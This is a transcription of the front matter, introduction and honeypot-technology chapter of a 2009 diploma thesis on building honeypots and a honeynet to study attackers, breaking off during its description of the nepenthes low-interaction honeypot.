Using Honeypots to Capture and Analyze Malicious Activities on the
Transcription
Using Honeypots to Capture and Analyze Malicious Activities on the
Using Honeypots to Capture and Analyze Malicious Activities on the Internet A Diploma Thesis by Stefan Vömel August 2009 First Examiner: Prof. Dr.-Ing. Felix C. Freiling Second Examiner: Prof. Dr.-Ing. Wolfgang Effelsberg Advisor: Dr. Thorsten Holz Ehrenwörtliche Erklärung Hiermit versichere ich, die vorliegende Diplomarbeit ohne Hilfe Dritter und nur mit den angegebenen Quellen und Hilfsmitteln angefertigt zu haben. Alle Stellen, die aus den Quellen entnommen wurden, sind als solche kenntlich gemacht worden. Diese Arbeit hat in gleicher oder ähnlicher Form noch keiner Prüfungsbehörde vorgelegen. Mannheim, im August 2009 Stefan Vömel Abstract A honeypot is “an information system resource whose value lies in unauthorized or illicit use of this resource” (see Spitzner, 2003g,a). It is intentionally designed insecurely and serves as an electronic bait to study the behavior of adversaries or protect an organization against Internet threats. Due to these characteristics, a honeypot complements traditional, more defenseoriented solutions such as firewalls or intrusion detection systems. However, the technology is also challenging: On the one hand, setting up a decoy can be a complex and time-consuming task. On the other hand, a compromised honeypot may pose a significant risk to unaffected third parties if the activities of the intruder are not properly anticipated. In the scope of this thesis, we illustrate the development process of so-called Live CD that implements a pre-configured, fully working electronic bait. With the help of our CD, numerous honeypots can be easily deployed within a short amount of time. The decoys are executed in a secured environment and, thus, can safely capture system probes and penetration attempts, particularly by self spreading worms, viruses, and other types of autonomously propagating malware. In the second part of this thesis, we present the architecture of our own honeynet, i.e., a specially monitored and controlled network of electronic baits. A honeynet facilitates collecting more extensive and expressive information about computer criminals. Thereby, we are able to gain a deep insight into the underground community and better understand the tools, tactics, and motives of attackers. Zusammenfassung Ein Honeypot ist eine Informations-Systemressource, deren Wert in der unerlaubten oder rechtswidrigen Nutzung dieser Ressource liegt (vgl. Spitzner, 2003g,a). Als bewusst unsicher aufgebauter elektronischer Köder“ ermöglicht sie eine Verhaltensstudie böswilliger Angreifer ” oder die Erkennung potentieller Gefahren aus dem Internet. Aufgrund dieser Merkmale kann ein Honeypot auch zum indirekten Schutz von Unternehmen eingesetzt werden und ergänzt klassische, verteidigungsorientiertere Sicherheitslösungen wie Firewalls oder Frühwarnsysteme. Der Einsatz eines elektronischen Köders ist jedoch mit gewisen Herausforderungen verbunden: Einerseits kann sein Aufbau aufwendig und zeitintensiv sein. Andererseits stellt ein kompromittierter Honeypot möglicherweise ein erhebliches Risiko für unbeteiligte dritte Parteien dar, sofern den Aktivitäten des Angreifers nicht ausreichend entgegen gewirkt wird. Im Rahmen dieser Diplomarbeit stellen wir deshalb eine sogenannte Live CD vor, mit deren Hilfe vorkonfigurierte, voll funktionsfähige Köder innerhalb einer kurzen Zeit aufgestellt werden können. Da die Systeme in einer abgesicherten Umgebung ausgeführt werden, ist die Beobachtung und Aufzeichnung von Einbruchsversuchen, vor allem durch selbstverbreitende Würmer, Viren und andere Schadprogramme, gefahrlos durchführbar. Im zweiten Teil dieser Arbeit veranschaulichen wir die Architektur eines Honeynets, d.h., eines speziell überwachten und kontrollierten Netzwerkes einzelner elektronischer Köder. Ein Honeynet erleichert eine umfangreichere und aussagekräftigere Sammlung von Informationen über Computerkriminelle. Dadurch sind wir in der Lage, einen umfassenden Einblick in eine Untergrundbewegung des Internets zu gewinnen und die Werkzeuge, Taktiken und Motive der Angreifer besser zu verstehen. Contents 1 Introduction 1 2 Honeypot Technology 2.1 Introduction to Honeypots . . . . . . . . 2.2 High-Interaction Honeypots . . . . . . . 2.3 Low-Interaction Honeypots . . . . . . . . 2.4 Example of an Advanced Low-Interaction 2.5 Deployment Options for Honeypots . . . 2.6 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Honeypot . . . . . . . . . . . . 3 Honeynet Technology 3.1 Historical Implementations of Honeynets . . . . 3.2 GenII Honeynets . . . . . . . . . . . . . . . . . 3.2.1 Data Control Implementations . . . . . . 3.2.2 Data Capture Implementations . . . . . 3.3 GenIII Honeynets . . . . . . . . . . . . . . . . . 3.4 Virtual Honeynets and Future Implementations 3.5 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 Development of a Live CD-Based Honeypot 4.1 Overview about Popular Live CD Distributions . . . . . . . . . . 4.2 Selection Model for the Live CD Distributions . . . . . . . . . . . 4.2.1 Overview about the Decision Attributes . . . . . . . . . . 4.2.2 Calculation of the Decision Weights . . . . . . . . . . . . . 4.2.3 Overview about the Scoring Model . . . . . . . . . . . . . 4.2.4 Selection of an Adequate Candidate CD . . . . . . . . . . 4.2.5 Summary of the Methodology . . . . . . . . . . . . . . . . 4.3 Development and Remastering Process of the Live CD . . . . . . 4.3.1 Technical Architecture of Slax . . . . . . . . . . . . . . . . 4.3.2 Project Specifications for the Live CD . . . . . . . . . . . 4.3.3 Illustration of the Remastering Process of the Live CD . . 4.3.4 Capturing Autonomously Spreading Malware with the Live 4.3.5 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . i . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . CD . . . . . . . . . 4 5 5 6 8 11 14 . . . . . . . 16 18 19 20 25 30 33 35 . . . . . . . . . . . . . 37 38 40 41 42 42 43 46 46 46 50 53 74 77 Contents 5 Implementation, Deployment, and Analysis of a Honeynet 5.1 Overview about the Architecture of the Honeynet and the System ronment . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5.1.1 Technical Specification of the Honeypots . . . . . . . . . . 5.1.2 Deployment of the Honeywall . . . . . . . . . . . . . . . . 5.1.3 Preparation of the System Environment . . . . . . . . . . 5.1.4 Summary of the Implementation and Deployment Process 5.2 Overview about the Collected Honeynet Data . . . . . . . . . . . 5.2.1 Interactions with the Honeynet . . . . . . . . . . . . . . . 5.2.2 Common Attacks on the Honeynet . . . . . . . . . . . . . 5.3 Selected Attacks on the Honeynet . . . . . . . . . . . . . . . . . . 5.3.1 Attack on the Microsoft Windows Honeypot . . . . . . . . 5.3.2 Attack on the Linux Honeypot . . . . . . . . . . . . . . . . 5.4 Analysis of an Underground Communication Channel . . . . . . . 5.4.1 Overview about the Captured Data . . . . . . . . . . . . . 5.4.2 Analysis of the Labeled Data . . . . . . . . . . . . . . . . 5.4.3 Classification of the Entire Text Corpora . . . . . . . . . . 5.4.4 Noticeable Characteristics of the Underground Market . . 5.5 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 79 Envi. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 80 81 85 89 96 98 98 100 110 110 124 135 136 137 142 145 147 6 Synopsis and Conclusion 148 A Configuration Script for the Nepenthes Honeypot 151 B Boot Options of the Live CD 153 References 155 ii List of Figures 2.1 2.2 2.3 2.4 2.5 User Interface of the Low-Interaction Honeypot Specter . . . . . Architecture of the Low-Interaction Honeypot nepenthes . . . . Setup and Architecture of a Virtual Honeypot . . . . . . . . . . Architecture of User-Mode Linux . . . . . . . . . . . . . . . . . Illustration of the Bridged Networking Functionality in VMWare . . . . . . . . . . . . . . . . . . . . . . . . . 8 9 12 13 14 3.1 3.2 3.3 3.4 3.5 3.6 3.7 3.8 3.9 3.10 Overview about the Honeynet Architecture . . . . . . . . . . . Architecture of a GenI Honeynet . . . . . . . . . . . . . . . . Architecture of a GenII Honeynet . . . . . . . . . . . . . . . . Network Filtering Capabilities of the Honeynet Gateway . . . Illustration of a Full and a Half-Open TCP Handshake . . . . Packet Drop Mode (PDM) of Snort Inline . . . . . . . . . . . Redirection of System Calls in the Sebek Monitoring Software Covert Data Channel Used by the Sebek Monitoring Software . Example of a Hybrid Virtual Honeynet . . . . . . . . . . . . . Example of a Distributed Honeynet . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17 19 20 21 23 24 29 29 33 34 4.1 4.2 4.3 4.4 4.5 4.6 4.7 4.8 4.9 4.10 4.11 4.12 4.13 4.14 4.15 4.16 4.17 4.18 Selection Process for the Live CD Distributions . . . . . . . . . . . Example of an Ordinal Rating Scale . . . . . . . . . . . . . . . . . . Boot Sequence of the Slax Live CD . . . . . . . . . . . . . . . . . . Illustration of the Union File System . . . . . . . . . . . . . . . . . Functionality of the Live CD-Based Honeypot . . . . . . . . . . . . Overview about the Remastering Process . . . . . . . . . . . . . . . Illustration of the GNU Configure and Build System . . . . . . . . . Directory Structure of the Secured Live CD Environment . . . . . . Honeypot Configuration Interface of the Live CD . . . . . . . . . . Architecture of the Notification System on the Live CD . . . . . . . Overview about the Recompilation Process of the Kernel . . . . . . Two-Factor Authentication Process of the SSH Service . . . . . . . Components of the KDE Platform . . . . . . . . . . . . . . . . . . . User Interface of the Live CD . . . . . . . . . . . . . . . . . . . . . Origin and Intensity of Malware Attacks . . . . . . . . . . . . . . . Number of Detected Malware Downloads and Submissions per Day Detection Rates of 32 Antivirus Vendors . . . . . . . . . . . . . . . Individual Performance of 32 Antivirus Vendors . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 40 43 47 49 52 53 57 60 62 63 67 70 72 73 74 75 76 77 iii . . . . . . . . . . List of Figures 5.1 5.2 5.3 5.4 5.5 5.6 5.7 5.8 5.9 5.10 5.11 5.12 5.13 5.14 5.15 5.16 5.17 5.18 5.19 5.20 5.21 5.22 5.23 5.24 5.25 5.26 5.27 5.28 5.29 5.30 5.31 5.32 Main Screen of the Walleye Web Management Interface . . . . . . . . . . 88 Overview about the Network Flows from/to the Honeynet . . . . . . . . 89 Example of an Intrusion Attempt on a Honeypot . . . . . . . . . . . . . 89 Example of a Trojaned System Service . . . . . . . . . . . . . . . . . . . 91 Restoring a Captured FTP Session with Wireshark . . . . . . . . . . . . 93 Analyzing Web-Based Attacks with DataEcho . . . . . . . . . . . . . . . 94 System Architecture of the Honeynet . . . . . . . . . . . . . . . . . . . . 97 Origins of Machines Interacting with the Honeynet . . . . . . . . . . . . 99 Classification of Attacks Reported by the Snort Intrusion Detection System100 Request of the DFind Vulnerability Scanner . . . . . . . . . . . . . . . . 101 Geographical Spread of PopUp Spam Attacks . . . . . . . . . . . . . . . 103 Packet Dump of the Slammer Worm . . . . . . . . . . . . . . . . . . . . 104 Origins of Password Brute Force Attacks . . . . . . . . . . . . . . . . . . 105 User Accounts Targeted By Password Brute Force Attacks . . . . . . . . 106 Schematic Overview of a Distributed Denial of Service Attack . . . . . . 107 Number of UDP Packets Captured per Day in the Honeynet . . . . . . . 108 Timeline of a UDP Packet Storm on a Honeypot . . . . . . . . . . . . . . 109 Analysis of a UDP Packet Storm . . . . . . . . . . . . . . . . . . . . . . 109 User Interface of the c99 shell Trojan Backdoor . . . . . . . . . . . . . . 112 Analyzing Encrypted Network Traffic with Wireshark . . . . . . . . . . . 116 Subversion of a System With the Hacker Defender Rootkit . . . . . . . . 117 Custom Login Banner of the Attacker . . . . . . . . . . . . . . . . . . . . 118 Timeline of the Attack on the Windows Honeypot . . . . . . . . . . . . . 120 Flowchart Diagram of the Captured Attack Tools . . . . . . . . . . . . . 129 Timeline of the Attack on the Linux Honeypot . . . . . . . . . . . . . . . 133 Number of Messages Sent per Day to the Communication Channel . . . . 136 Number of Active Users per Day in the Communication Channel . . . . . 137 Distribution of Offers and Requests for Hacking-Related Goods and Services138 Types of Hacking-Related Goods and Services . . . . . . . . . . . . . . . 138 Process of a Machine Learning-Based Text Classification . . . . . . . . . 143 Estimated Distribution of Offers and Requests in the Text Corpora . . . 145 Active Lifetime of Nicks in the Communication Channel . . . . . . . . . 146 iv List of Tables 2.1 Advantages and Disadvantages of Low-Interaction and High-Interaction Honeypots . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15 3.1 3.2 3.3 List of Possible netfilter Actions . . . . . . . . . . . . . . . . . . . . . . . List of Connection States as Distinguished by IPTables . . . . . . . . . . Metrics Used by the p0f Passive Fingerprinting Utility . . . . . . . . . . 22 22 32 4.1 4.2 4.3 4.4 4.5 4.6 4.7 4.8 4.9 4.10 4.11 Main Characteristics of Live CD Distributions . . . . . . . . . . . . . . . Attribute Ranks and Weights for the Candidate CDs . . . . . . . . . . . Attribute Values for the Candidate CDs . . . . . . . . . . . . . . . . . . Attribute Ratings and Weighted Sums for the Live CDs . . . . . . . . . . Weighted Sums for the Live CDs after the Sensitivity Analysis . . . . . . Base Modules Included in the Slax Live CD . . . . . . . . . . . . . . . . Custom-Built Modules of the nepenthes Low-Interaction Honeypot . . . . Dependency Libraries Required for the nepenthes Low-Interaction Honeypot Overview about the Run Levels of the Operating System . . . . . . . . . Important User and System-Wide Directories of the KDE Platform . . . Top Malware Samples Captured with the Live CD . . . . . . . . . . . . . 40 42 44 45 45 50 56 58 68 73 76 5.1 5.2 5.3 5.4 5.5 5.6 5.7 Technical Specification of the Honeypots . . . . . . . . . . . . . . . . . . Important Configuration Options of the Honeywall . . . . . . . . . . . . Top 10 Countries Interacting with the Honeynet . . . . . . . . . . . . . . Origins of PopUp Spam attacks . . . . . . . . . . . . . . . . . . . . . . . Top 30 Passwords Used During Brute Force Attacks . . . . . . . . . . . . Countries Involved in Different Distributed Denial of Service Attacks . . Additional Components of the Serv-U FTP Server that are Required to Establish a Secured Connection . . . . . . . . . . . . . . . . . . . . . . . 5.8 Attack Tools Used During the Compromise of the Windows Honeypot . . 5.9 Attack Tools Used During the Compromise of the Linux Honeypot . . . . 5.10 Average Precision and Recall Values of the Training Data . . . . . . . . . v 85 87 99 103 106 108 115 119 132 144 Listings 3.1 3.2 3.3 Sample Rule for the Packet Replace Mode (PRM) of Snort Inline . . . . Example of a Swatch Configuration File . . . . . . . . . . . . . . . . . . . Sample Rule of the Snort Intrusion Detection System . . . . . . . . . . . 25 26 27 4.1 4.2 4.3 4.4 4.5 4.6 Preparation of the System Environment . . . . . . . . . Sample Boot Label of the Isolinux Boot Loader . . . . . Creating a Kernel Logo for the Live CD . . . . . . . . . Compiling the Kernel for the Live CD . . . . . . . . . . . Mounting the Initial Ram to Adapt the linuxrc Start File Example of a TCP Wrapper Configuration . . . . . . . . 54 64 65 66 67 70 5.1 5.2 Restoring Windows Executables with PEHunter . . . . . . . . . . . . . . 95 Example of a Network Scan for Instances of the phpMyAdmin Database Administration Program . . . . . . . . . . . . . . . . . . . . . . . . . . . 101 Example of a PopUp Spam Message . . . . . . . . . . . . . . . . . . . . . 102 Manipulation of the System Database . . . . . . . . . . . . . . . . . . . . 111 Installation of the Serv-U FTP Server . . . . . . . . . . . . . . . . . . . . 113 Modification of the System Registry . . . . . . . . . . . . . . . . . . . . . 113 System Hardening Operations on the Compromised Honeypot . . . . . . 114 Extract of Keystrokes Captured by Sebek . . . . . . . . . . . . . . . . . . 125 Setup Script of a Trojaned Secure Shell Server . . . . . . . . . . . . . . . 126 Backdoor Mechanism Implemented in the Secure Shell Server . . . . . . . 126 Exploit for the Webmin and Usermin Web Applications . . . . . . . . . . 130 Sample Advertisement for Hacking-Related Goods . . . . . . . . . . . . . 137 Sample Advertisements and Requests for Stolen Credit Cards and Credit Card-Related Information . . . . . . . . . . . . . . . . . . . . . . . . . . 139 Sample Advertisements and Requests for Cashiers, Confirmers, and Drops 140 Sample Advertisements and Requests for Bank Logins and Online Accounts140 Sample Advertisements and Requests for Hacked Hosts . . . . . . . . . . 141 Example of a Full Personal Record . . . . . . . . . . . . . . . . . . . . . 142 Sample Advertisements and Requests for Personal Data . . . . . . . . . . 142 Sample Advertisements and Requests for Hardware Equipment . . . . . . 142 Sample Messages Indicating Distrust in Other Market Participants . . . . 146 5.3 5.4 5.5 5.6 5.7 5.8 5.9 5.10 5.11 5.12 5.13 5.14 5.15 5.16 5.17 5.18 5.19 5.20 vi . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 Introduction In the course of slightly less than one and a half decades, the Internet has evolved to one of the major information and communication platforms: According to a study by the Miniwatts Marketing Group (2008), the number of Internet users worldwide has risen from 16 million in 1995 to more than 1.5 billion in 2009. By the year 2010, up to 1.65 billion people are expected to browse web pages, read e-mail, visit chat rooms, and participate in online discussion forums. In parallel, the commercial role of the World Wide Web (WWW), as the Internet is also frequently called (cmp. Tanenbaum, 2003), has become more and more important as well: For instance, solely in Germany, remedies in electronic commerce have more than doubled to 438 billion euros within a period of three years (see Pols, 2007), and almost one out of three Europeans have ordered goods or services online in the last twelve months (see Eurostats, 2008). Unfortunately, with the increasing use and financial importance of the Internet, computer systems and network architectures have become valuable targets for cyber criminals, too. Human miscreants as well as automated viruses, worms, and other types of autonomously propagating malware attempt to exploit vulnerabilities in system platforms and software applications in order to get in control of the underlying machine. At the time of this writing, more than 44,000 security weaknesses have been discovered (see CERT, 2009). What is worse, as a survey by the Computer Security Institute (CSI) shows, 43% of the interviewed business organizations have already fallen prey to an attack (Richardson, 2008, p. 13-16). On average, the respondents suffered a loss of almost $290,000. To keep up with current and future threats, a large part of corporations consider security as one of the top goals in the information technology (IT) sector (cmp. Capgemini, 2008). To a great degree, however, implementations are based on traditional, purely defense-oriented technologies, e.g., firewalls, intrusion detection systems (IDSs), and encryption routines (see Honeynet Project, 2006). The main objective of these approaches is to recognize malicious activities in time and protect the infrastructure of the enterprise as best as possible. Getting to know the tools, tactics, and motives of intruders is of lesser priority. As a result, the role of administrators is restricted to reaction, and blackhats succeed in gaining informational advantages in the long term (cmp. Honeynet Project, 2004b). For this reason, IT professionals have also begun to emphasize pro-active measures more recently and suggested deploying so-called honeypots. Honeypots are closely watched electronic baits and are intentionally designed insecurely. Forming potentially attractive targets, attackers are lured into a trap when they 1 1 Introduction try to compromise a machine: While breaking in the decoy, all their actions are recorded and analyzed. Thus, it is possible to learn the offensive techniques of adversaries in detail, develop appropriate counter-strategies, and prevent similar system penetrations in the future (cmp. Spitzner, 2001a). Outline of the Thesis This thesis is outlined as follows: In Chapter 2, we introduce the concept of honeypots in detail. We illustrate the fundamental characteristics of different types of decoys and depict their respective advantages and disadvantages. Furthermore, we briefly describe common deployment approaches for electronic baits that have proven useful in practice for capturing malicious activities. As we will see, multiple honeypots may be combined in a so-called honeynet to observe attacks not only on a single system, but on a network-wide scope. Even though this procedure may help creating more accurate profiles of adversaries, we also need to implement sophisticated control and monitoring facilities in order to mitigate risks for uninvolved third parties as best as possible. We give an overview about these activities as well as about historical, modern, and future honeynet technologies in Chapter 3. At the time of this writing, deploying larger numbers of electronic baits can be a complex and time-consuming task (see also Sadasivam et al., 2005). For this reason, we develop a bootable Live CD that completely runs in memory and comprises a preconfigured, working honeypot. The development and evaluation process of the device is subject of Chapter 4. With the help of our CD, numerous decoys may be easily and comfortably connected to the Internet within a short amount of time. Thereby, we are able to collect threats such as autonomously propagating worms and viruses on a large scale. In addition, we set up several machines that offer access to full-featured operating systems, services, and applications. Since the individual components contain certain, well-known security weaknesses, the machines form attractive targets, particularly for human miscreants. A selection of specific attacks that we have witnessed in the course of this thesis is presented in Chapter 5. We conclude with a short summary of our work in Chapter 6 and propose various opportunities for future research. Results of the Thesis As we have already indicated, with our Live CD that we have developed in the course of the thesis, we may significantly facilitate the configuration and deployment process of electronic baits. Security professionals are able to connect a fully working decoy to the Internet and start monitoring probes and compromises within minutes. Each threat that is captured with the CD is automatically sent to a central analysis station for further investigation. Reports that are generated by the station may help assess the potential risk on the Internet that is caused by common worms, viruses, and 2 1 Introduction other types of autonomously spreading malware. Moreover, the collected samples may be used to evaluate the performance of virus scanners and similar security-related software products. In our preliminary test with more than 1,000 unique malicious binaries, detection rates of different anti-virus vendors turned out to partially vary dramatically. In addition, we have deployed as well as maintained a small honeynet with three electronic baits over a period of slightly more than five months. During this time, we have captured more than 21.5 Gb of raw network traffic and monitored a large number of probes and penetration attempts on the individual decoys. After examining the incidents in detail, we illustrate typical attack strategies security professionals are likely to be confronted with in practice as well. Furthermore, we present two selected compromises of a Linux- and Windows-based honeypot and outline the tools, tactics, and motives of the intruders. Thereby, we are able to catch a glimpse on the underground community and gain a better understanding of adversaries operating in cyberspace to date. Acknowledgements First and foremost, I would like to thank Prof. Dr. Felix Freiling for giving me the opportunity to work in the field of IT security at the Laboratory for Dependable Distributed Systems, University of Mannheim. I would also like to express my deepest gratitude to my advisor, Dr. Thorsten Holz. He always gave me valuable advice and feedback, indicated new research directions, and did not leave any of my questions unanswered. Many thanks go to Johannes Stüttgen as well. Without his assistance, I would not have been able to deploy my Live CD and start capturing autonomously spreading malware. The same holds true for Viviana Nichica who was irreplaceable while translating the source code of several Romanian attack tools. Acknowledgments are also owed to Jürgen Jaap for providing me with the necessary hardware equipment and Ben Stock for setting up my personal interface to the analysis station. In addition, I greatly benefited from the dedication of the members of the Honeynet Project. In particular, I appreciate the support of Robert McMillen and Earl Sammons. Last but not least, I would like to say thank you to Nicholas Chantler for sending me his PhD thesis and helping me gain an insight in the mind of adversaries. 3 2 Honeypot Technology As we have indicated in the introduction of this thesis, especially business corporations focus on traditional, defense-oriented techniques in order to protect their resources from threats on the Internet. For example, administrators frequently deploy firewalls, intrusion detection systems (IDS), and intrusion prevention systems (IPS) to identify suspicious activities at the network perimeter (cmp. Deloitte, 2009). With the help of signatures, patterns for well-known attacks, the devices are able to discover a broad category of penetration attempts (see Paxson, 1998). Many implementations also look for anomalies in network data and attempt recognizing unusual traffic flows that are potential signs of an incident (see Barford et al., 2002; Leckie and Kotagiri, 2002; Jung et al., 2004). In spite of these benefits, Richardson (2008, p. 17) argues that the “measures that organizations have taken against their attackers (...) are fundamentally imperfect”. For instance, both intrusion detection as well as intrusion prevention systems suffer from several inherent problems: First, the systems generate a significant amount of false positives, i.e., legitimate traffic is erroneously reported as being malicious (see Zhang and Leckie, 2006). Due to this misclassification, false positives are a serious issue as “they diminish the value and urgency of real alerts” (see Timm, 2001). What is worse, said technologies also have difficulties in reliably detecting specific types of probes and attacks (see Levchenko et al., 2004) or may even be completely circumvented (see Handley et al., 2001; Chung et al., 1995; Ptacek and Newsham, 1998; Wagner and Soto, 2002). To properly cope with these factors, IT professionals have recently started to propose the use of electronic baits in addition to more conventional methods of combatting computer crime. The characteristics of these so-called honeypots are presented in detail in the following sections. Outline of the Chapter In Section 2.1, we introduce the concept of honeypots, outline their value, and illustrate their field of application. As we will see, we may distinguish two basic types of electronic baits. Their individual advantages and disadvantages are explained in Section 2.2 and 2.3, followed by a brief description of a particularly powerful decoy that is capable of capturing self propagating worms, viruses, and other malicious software programs on a large scale. Last but not least, we sketch two common deployment options for honeypots and conclude with a short summary of our findings. 4 2 Honeypot Technology 2.1 Introduction to Honeypots In compliance with the original posting on the honeypot mailing list, we define a honeypot as “an information system resource whose value lies in unauthorized or illicit use of that resource” (see Spitzner, 2003g,a). It acts as an electronic bait for computer criminals that is intentionally designed to be probed, attacked, and compromised (see Spitzner, 2002). It is important to note that, according to the definition, such a resource may potentially be any digital entity, e.g., a database or a document (cmp. Honeynet Project, 2004b). In the scope of this thesis, we refer to a honeypot as a single computer system though. Any other resource that serves as a decoy is termed a honeytoken for clarity purposes (cmp. Spitzner, 2003f). Honeypots have no production value, i.e., they offer no productive services that are of interest to legitimate system users (see also Spitzner, 2001a). Consequently, any transactions and interactions with these machines are suspicious and likely reflect unauthorized or malicious activity. For this reason, data sets collected with a honeypot as well as the number of encountered false positives are significantly smaller compared to traditional monitoring devices such as IDSs and IPSs. That is why security professionals may manage and analyze incident-related information more easily (cmp. Honeynet Project, 2004b). In addition, as “any activity with the honeypot is an anomaly”, we can detect and identify previously unknown intrusion strategies, because “new or unseen attacks stand out” (see Honeynet Project, 2004b, p. 19). For these purposes, we also record all traffic flows entering or leaving a decoy with several software applications that are provided and maintained by members of the Honeynet Project. As we will see in Chapter 5, these applications are extremely powerful and even permit monitoring encrypted network sessions. Thereby, we are able to recover the steps of adversaries and learn more about their specific tools, tactics, and motives. This research-oriented approach facilitates coming to a better understanding of the underground community in the long term and encourages finding proper countermeasures against miscreants (see Spitzner, 2002). On the other hand, when deployed within a productive environment, honeypots may help recognize threats in time and protect resources of an organization. Thus, they directly contribute to the security of an enterprise (cmp. Spitzner, 2001a, 2003e). Depending on the level of risk that is associated with an electronic bait and the possibilities of interaction, we distinguish high-interaction and low-interaction honeypots. The major characteristics of these two types are presented in the following. 2.2 High-Interaction Honeypots High-interaction honeypots are frequently based on commercial off-the-shelf (COTS) computer systems and offer attackers complete operating systems as well as fully functional applications and services to interact with (cmp. Provos and Holz, 2007). Thus, 5 2 Honeypot Technology when this type of electronic bait is compromised, a blackhat may get in entire control of the machine, upload her own tools, and modify files and system settings. Due to this unrestricted access and a high level of freedom, security professionals are able to collect in-depth information about the incident, the intentions of the intruder as well as her motives (cmp. Honeynet Project, 2000b,a). For instance, high-interaction honeypots have proven useful for studying identity theft-related phishing attacks and automated credit card frauds in the past (see Watson et al., 2005; Honeynet Project, 2003a). In addition, as these decoys make “no assumptions on how an attacker will behave” (see Spitzner, 2003a), they are even capable of capturing so-called 0-day exploits, i.e., exploits that have never been encountered “in the wild” before (cmp. Honeynet Project, 2004b). However, in spite of these benefits, several aspects must be taken into consideration before starting to deploy high-interaction honeypots: First, the technology is rather complex to set up and configure, maintenance can be extremely time-consuming (see Spitzner, 2002). Second, some efforts have been made in the underground community more recently to detect the presence of a monitored environment. For example, various authors succeeded in reliably identifying data capture facilities running on a decoy (see Corey, 2003, 2004; Dornseif et al., 2004a). Other approaches seek to find anomalies in the system setup and attempt to distinguish honeypots from real machines (see Holz and Raynal, 2005b; Provos and Holz, 2007). When a device has successfully been detected, it is likely adversaries will either completely evade it in the future or insert bogus data in order to pollute log files and make a later investigation more difficult (see Spitzner, 2004). In this case, its value is dramatically reduced, and “the game is almost over” (see Holz and Raynal, 2005b, p. 30). Furthermore, because of the inherent open architecture of high-interaction electronic baits, the external environment is constantly exposed to a certain level of threat (see Spitzner, 2001b). For example, adversaries may use a compromised decoy as a starting point for further malicious activities. That is why each honeypot must be carefully administrated and closely watched in order to mitigate risks for unaffected third parties as best as possible. Participants of the Honeynet Project have developed a number of utilities that greatly facilitate the latter tasks. We will give a detailed overview about these utilities in Chapter 3. 2.3 Low-Interaction Honeypots The level of risk as described above can be significantly reduced when using low-interaction honeypots. These electronic baits only emulate specific services, i.e., intruders are tricked to be interacting with a real machine, while in reality, they operate in a closely watched, simulated environment (cmp. Spitzner, 2002). For instance, a low-interaction honeypot may provide a virtual FTP server attackers can connect to. When a session is initiated and the adversary attempts to log in, her IP address as well as her authentication credentials are recorded for information gathering purposes. Any other additional requests 6 2 Honeypot Technology such as uploading or downloading files are, however, rejected (cmp. Spitzner, 2003a). Thus, in comparison to high-interaction honeypots, the possibilities of interaction are substantially reduced. Consequently, administrators stay in control of their machine and do not need to be afraid of a total system compromise. In parallel, the risk for the external environment is effectively minimized. Low-interaction honeypots are easy to install, configure, and maintain (see Spitzner, 2002). That is why they may be deployed on a large scale without difficulty. For example, in the course of the Leurre.com project1 , security professionals have started to set up numerous platforms with several emulated operating systems in different locations all over the world. Each platform periodically sends their captured data to a central database. Thereby, it is possible to generate extensive statistics about attack patterns and trends at a higher level of abstraction, even though the amount of information collected with a single decoy may be quite limited (see Pouget et al., 2005; Holz, 2006). Similar approaches have been pursued by other authors to examine the spread of autonomously propagating malware on the Internet (see Provos, 2004; Bächer et al., 2006; Göbel et al., 2006; Itzel, 2007). On the other hand, due to their simple design, low-interaction honeypots are often unable to deal with unexpected behavior, i.e., they are not capable of capturing 0-day exploits or other previously unknown threats. What is worse, they are comparatively easy to fingerprint: For instance, sophisticated attackers may trigger resource-intensive operations and examine corresponding response latencies to reveal the true nature of the decoy (cmp. Provos and Holz, 2007). As we have already explained, the value of the device highly decreases in this case. In spite of these disadvantages, low-interaction honeypots are frequently favored within a productive environment and are particularly popular among organizations in the financial and manufacturing industry (see Honeynet Project, 2004b). The majority of existing solutions is offered free of charge, e.g., the rather old Deception Toolkit (DTK)2 or the Tiny Honeypot (thp)3 by George Bakos. Commercial products such as Specter4 usually permit emulating a larger number of operating systems and services. Their behavior and appearance can be easily configured and adapted with a comfortable graphical user interface (see Figure 2.1). Thereby, the deployment process of a decoy may be completed within a short amount of time. A more advanced variant of a low-interaction honeypot is subject of the following section. 1 see see 3 see 4 see 2 http://www.leurrecom.org/ http://all.net/dtk/download.html http://www.alpinista.org/thp/ http://www.specter.com/ 7 2 Honeypot Technology Figure 2.1: User Interface of the Low-Interaction Honeypot Specter (Source: NETSEC, 2009) 2.4 Example of an Advanced Low-Interaction Honeypot A powerful variant of a low-interaction honeypot is nepenthes5 . It is open source, free of charge, and is actively maintained by Paul Bächer, Markus Kötter, and several other security professionals. Nepenthes is particularly suitable for capturing self spreading malware on a large scale, i.e., it is capable of downloading considerable amounts of worms, bots, and other types of malicious software that are autonomously propagating in the wild (see Provos and Holz, 2007). For instance, in a preliminary study, Goebel et al. (2007) succeeded in retrieving more than 2,500 unique malicious binaries in a period of only 8 weeks. Similar collections may help identify common threats on the Internet, generate statistics about current attack patterns, and support the development of high-quality detection signatures for antivirus scanners and other security-related applications. 5 http://nepenthes.carnivore.it/ 8 2 Honeypot Technology Figure 2.2: Architecture of the Low-Interaction Honeypot nepenthes (Source: Bächer et al., 2006) With respect to its architecture, nepenthes is based on a flexible design and consists of various program modules that are required for capturing and processing the different malware samples. In particular, Bächer et al. (2006) distinguish vulnerability modules, shellcode parsing modules, fetch modules, submission modules, and logging modules. Their functionality is briefly illustrated in 